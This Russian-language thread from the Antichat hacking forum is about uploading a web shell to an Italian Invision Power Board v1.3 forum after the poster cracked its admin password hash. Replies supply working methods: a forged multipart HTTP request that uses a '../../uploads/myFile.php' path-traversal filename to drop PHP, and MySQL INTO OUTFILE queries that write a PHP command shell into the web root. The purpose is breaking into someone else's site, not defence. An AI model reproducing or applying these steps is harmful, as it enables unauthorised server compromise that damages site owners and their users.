Форум АНТИЧАТ - Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final

Powered by Invision Power Board(U) v1.3 Final
короче получил хеш,расшифровал,захожу в админку,в смайлики пытаюсь закачать шелл пишет :
Upload Fallito!
пытался настраивать разрешенные типы файлов( разрешал *.phtml) и всё равно не пашет,может на форуме были подобные темы,но просьба мне дать нормальное объяснение как закачать шелл в таких обстоятельствах =)
плизз

Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
Если залить шелл в папку со смайликами не удаётся (папка закрыта на запись), то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php
ЗЫ: И таких тем полно по форуму! Не ленись пользоваться поиском! Вот к примеру: http://forum.antichat.ru/thread11725.html

Цитата:

Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...

как раз Upload Fallito!,форум итальянский..

Цитата:

то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php

я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся

Цитата:

Сообщение от 0verfe1

я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся

"Замудренно"? Там всё так расписано, что не суметь повторить этого я думаю очень сложно. Статья написана очень подробно и понятно имхо.

Цитата:

POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

вот мне только не понятно 7d43942c405bc что это за значение ? и откуда я его могу взять ? без него отправить получилось но скрипта на месте не оказалось..

Попробуй залить через mysql. Где-то на рстшном форуме была статейка, ну примерно вот так:
create table ibf_shell(myshell char(50));
Insert into ibf_shell(myshell) values('<?тут пишешь php-команды, типа system("id")?>');
Select myshell from ibf_shell into outfile 'тут полный путь к файлу, типа /home/qwerty/www/uploads/cmd.php';
Если прав на аутфайл хватит, то считай что тебе повезло. Кроме того, ели включены register_globals, то можешь ввести что-то типа этого system($_GET)(вроде так). НО!
Я юзал так несколько форумов, и прав на вывод в outfile у меня не хватало, т.е. было
permission denied for user admin@localhost :( .
Если помог - ткни на репутацию... ;)

да ты прав такой способ катит...еще один вариант создаешь темку с названием
<? $_GET[cmd]; ?>
потом с тем же outfile-ом выводишь эти строки в файл, просто надо тада запомнить столбец в котором нах-ся названия тем(я в мускуле не силен надеюсь прально сказал=)))

Повторюсь, если админ не полный кретин, то прав на вывод в outfile не хватит